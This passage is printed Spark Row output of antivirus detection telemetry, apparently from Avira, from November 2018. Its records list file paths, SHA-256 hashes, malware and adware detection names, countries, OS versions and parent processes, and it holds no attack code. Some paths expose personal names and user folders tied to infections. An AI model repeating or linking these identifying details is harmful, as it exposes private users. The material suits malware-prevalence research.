  Row(detection=Row(filename='pptlf4.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\Mozilla\\Extensions\\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\\textlinks@plpickle.com\\components\\pptlf4.dll', filesize=128000, name='HEUR/AGEN.1021027.#M1.#R1'), hash='fdab6658911d870cb5a08c26ca7e0b29ef147a00433cb8d35f2bdd235d6ec4d8', metadata=Row(cmdline='-k secsvcs', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:31:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102029-a2f61c72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102029-A2F61C72', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T09:45:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbjndkcn.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\nBjnDkCN.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lovebeat.exe', filepath='D:\\Online Games\\Steam\\steamapps\\downloading\\354290\\LoveBeat.exe', filesize=3152000, name='TR/Patched.Ren.Gen2.#M300.#R100092'), hash='cf02df4d4f690635255a92095260651aec4ddbd92cf889f99e5320e0369b051d', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='search provided by bing docif', filepath='C:\\Windows\\System32\\Tasks\\Search Provided by Bing docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='f114c8e8be633ef687950961e4ca8b06cd88077eab28319fdb65d2330a9b5835', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:36:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\PAJERO NOVA DAKAR - PWJE1712R\\TOOL\\MSV\\ENV\\MSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='7fc9ed74519b129833488bb727bc5d936576d6f939cfc9458c6ab2e17fc2debf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsa7D73.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='al_bokhary.exe', filepath='D:\\المكتبة\\New folder (6)\\New folder\\Al-Bokhary_1\\AL_Bokhary.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='d1e8f0f1ad893e6b87b0142bc7c1cbec26f67499adf8a1559a6a1b361c482809', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T14:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221430-562d3588', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221430-562D3588', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xckvdmgz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\xCKVdmGZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082548-df64fcc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-082548-DF64FCC3', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='7695db58a17aa32b3dd07463a56ea50078d361af3009b73794834bf53f13819a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135450-5ef1a34b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-134656-27EA83EE\\AVSCAN-20181102-135450-5EF1A34B', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:52:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102301-0735bc1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-102301-0735BC1C', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cpryg.exe', filepath='c:\\users\\X\\appdata\\roaming\\cpryg.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T14:49:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181437-63cbff6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dde6b91\\AVSCAN-20181102-175827-0F3232B0\\AVSCAN-20181102-181437-63CBFF6A', filesize=1280000, name='TR/Agent.anqai.#M1.#R1'), hash='bd25952768b6332da9a97a9234b8abe029fac840c7a5f025a8fc3937f543386b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:14:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='de.exe', filepath='I:\\NASIR BAHI\\nasir laptop data\\desk top data G.R. Balouch\\KINGSTON (H)\\urDrive\\Resources\\ErrorPage\\de\\de.exe', filesize=2560000, name='WORM/Bugus.A.#M1.#R1'), hash='ef6620bc3b20af81b7cb7b8f94fbc00bf903bf352a169de6cabbf479e753b5ca', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_000383', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Opera Software\\Opera Stable\\Cache\\f_000383', filesize=64000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='d179fea3073166d420da6b7c8498f6ba7e4adb4c5e586cbc1f544a31fc044994', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:54:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-014905-9ff0e1f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4d3016c4\\AVSCAN-20181102-005854-FC38E0AB\\AVSCAN-20181102-014905-9FF0E1F6', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:48:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100229-36b4864d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-100229-36B4864D', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='922500ddc62333f8bbbff17e343518a3b40d6f7cbb4a8a83498de8cd7e73ae7e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151703-4120b824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0c607d02\\AVSCAN-20181102-151640-3C5D8903\\AVSCAN-20181102-151703-4120B824', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='d90f8e1682e65d19a56efb2b3d456fbe6f2de93238f3db5c56c904c8adc72ccd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='C:\\Program Files (x86)\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline='-k bilibiliGroupEx', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131735-2fbc8032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131735-2FBC8032', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113123.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113123.EXE', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064651-40047fa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064651-40047FA6', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073543-31fda131', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-073543-31FDA131', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zemax.exe', filepath='C:\\Program Files\\Zemax\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T18:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='e:\\autocadler\\autocad2007\\bin\\acadfeui\\program files\\common files\\microsoft shared\\vba\\vba6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='ea27d097eb2acac01fab9bdf67305c38049ee09e9abc7d17d09a3282e4d00742', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:34:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='86deb4fcf9dc77efc96cbbde9fc1318ab18dd18a', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\86deb4fcf9dc77efc96cbbde9fc1318ab18dd18a', filesize=3840000, name='W32/Virut.Gen.#M1.#R1'), hash='b5fe16e15219c2d0e8d97344601bf19156efbfc66e3ff9b0cc9445c3ef76a71b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:56:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='becce27f2365db0cb5bde6efa6b5f7c2b126a4cb', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\becce27f2365db0cb5bde6efa6b5f7c2b126a4cb', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='f10c007a404dbae3243abd50b27a193be17ae38ebc8bc1de4c5a01e23473df9c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:15:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:29:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202117-b5917a82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-202117-B5917A82', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:21:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:30:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002933e7', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002933e7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ca8b8c22d41620d3d1d05f30e5c3930514f539c06452b4a5ba4689cb5dc68530', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:30:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002976dc', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002976dc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:48:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205306-b48eaab3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205306-B48EAAB3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:53:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:04:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nstCC26.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T15:50:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152101-521f8005', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-152101-521F8005', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:21:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\_cdres\\_exe\\Install Navigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='fe57d2435a26d4a86188dc8b7caf402d0cbbdc584abfc6bfea36e7de89e4c172', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:09:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kact2.exe', filepath='D:\\Mihaela (my documents)\\Kx602212_UPD_Signed_en\\64bit\\XP and newer\\KACT2\\KACT2.exe', filesize=1024000, name='W32/Sality.Y.#M1.#R1'), hash='ff1eb69e5c74f8d29ec9821f227c2bfa0187ca74115d3bfb3ebccd0aa70f0539', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:44Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T17:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102022-ca9edc80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-102022-CA9EDC80', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='1941883fc633c8bbebef7d30e9cfec9fcc29dbd588b3eb1dce985bb47e138aa1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:26:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fxssvc.exe', filepath='F:\\FXSSVC.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6885ab5a728641ff27aa2b1e432b83f7565bb040bc8ad3c5e4cce6db011116cf', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-02T09:38:31Z'), dt=datetime.date(2018, 11, 2)),
